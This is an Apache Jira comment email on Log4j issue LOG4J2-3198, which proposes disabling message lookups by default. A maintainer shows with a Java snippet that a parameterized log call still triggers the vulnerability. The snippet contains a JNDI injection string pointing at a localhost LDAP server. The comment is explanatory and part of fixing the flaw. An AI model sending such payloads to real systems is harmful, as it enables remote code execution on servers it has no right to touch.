[ 
https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457333#comment-17457333
 ] 

Volkan Yazici commented on LOG4J2-3198:
---------------------------------------

[~eever...@usgs.gov], yes, unfortunately the lookup is performed _after_ 
formatting the message, which includes the user input. Hence the vulnerability 
can still be triggered using a {{ParametrizedMessage}}:

{code:java}
// attacker-controlled value arriving from user input
String userInput = "${jndi:ldap://127.0.0.1:1389/a}";
// the lookup is resolved on the formatted message, so the parameter is no protection
logger.info("foo {}", userInput);
{code}

> Message lookups should be disabled by default
> ---------------------------------------------
>
>                 Key: LOG4J2-3198
>                 URL: https://issues.apache.org/jira/browse/LOG4J2-3198
>             Project: Log4j 2
>          Issue Type: Improvement
>          Components: Layouts
>    Affects Versions: 2.14.1
>            Reporter: Carter Kozak
>            Assignee: Carter Kozak
>            Priority: Major
>             Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs 
> and implementation. Given a particular API, there's an expectation that a 
> particular shape of call will result in specific results. However, lookups in 
> messages can be passed into JUL and will result in resolved output in log4j 
> formatted output, but not any other implementations despite no direct 
> dependency on those implementations.
> There's also a cost to searching formatted message strings for particular 
> escape sequences which define lookups. This feature is not used as far as 
> we've been able to tell searching github and stackoverflow, so it's 
> unnecessary for every log event in every application to burn several cpu 
> cycles searching for the value.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)